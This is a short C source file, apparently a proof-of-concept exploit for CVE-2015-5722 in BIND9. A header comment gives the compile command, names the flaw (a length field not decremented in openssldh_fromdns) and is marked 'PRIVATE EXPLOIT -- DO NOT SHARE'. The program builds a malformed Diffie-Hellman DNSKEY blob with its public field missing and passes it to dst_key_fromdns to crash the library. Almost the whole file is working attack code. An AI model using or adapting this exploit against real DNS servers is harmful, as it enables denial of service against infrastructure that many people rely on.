/*
 *   compile with:
 *
 *       gcc -g -O2 -Wall  -I/usr/include/bind9 CVE-2015-5722.c -lisc -ldns
 *
 *         Crash is caused by not decrementing the r.length field in
 *           openssldh_fromdns.
 *
 *             PRIVATE EXPLOIT -- DO NOT SHARE
 *             */

#include <isc/mem.h>
#include <isc/buffer.h>
#include <isc/entropy.h>
#include <dst/dst.h>
#include <dns/name.h>
#include <dns/fixedname.h>

#include <err.h>

int
main(void)
{
  isc_mem_t *mctx = NULL;
  if (isc_mem_create(0, 0, &mctx) != ISC_R_SUCCESS) {
    errx(1, "isc_mem_create");
  }

  isc_entropy_t *ectx = NULL;
  if (isc_entropy_create(mctx, &ectx) != ISC_R_SUCCESS) {
    errx(1, "isc_entropy_create");
  }

  if (dst_lib_init(mctx, ectx, 0) != ISC_R_SUCCESS) {
    errx(1, "dst_lib_init");
  }

  isc_buffer_t b;
  isc_buffer_init(&b, "test.", 5);
  isc_buffer_add(&b, 5);
  dns_fixedname_t fname;
  dns_fixedname_init(&fname);
  dns_name_t *name = dns_fixedname_name(&fname);
  if (dns_name_fromtext(name, &b, NULL, 0, NULL) != ISC_R_SUCCESS) {
    errx(1, "dns_name_fromtext");
  }

  unsigned char blob[] = {
    0, 0, /* flags */
    0, /* proto */
    2, /* alg */

    0, 20, /* plen */
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
    0, 20, /* glen */
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
    0, 20, /* publen */
    /* missing pub field */
  };
  isc_buffer_init(&b, blob, sizeof(blob));
  isc_buffer_add(&b, sizeof(blob));

  dst_key_t *key = NULL;
  isc_result_t ret = dst_key_fromdns(name, /* class */ 1, &b, mctx, &key);
  if (ret != ISC_R_SUCCESS) {
    errx(1, "dst_key_fromdns: %s", isc_result_totext(ret));
  }

  return 0;
}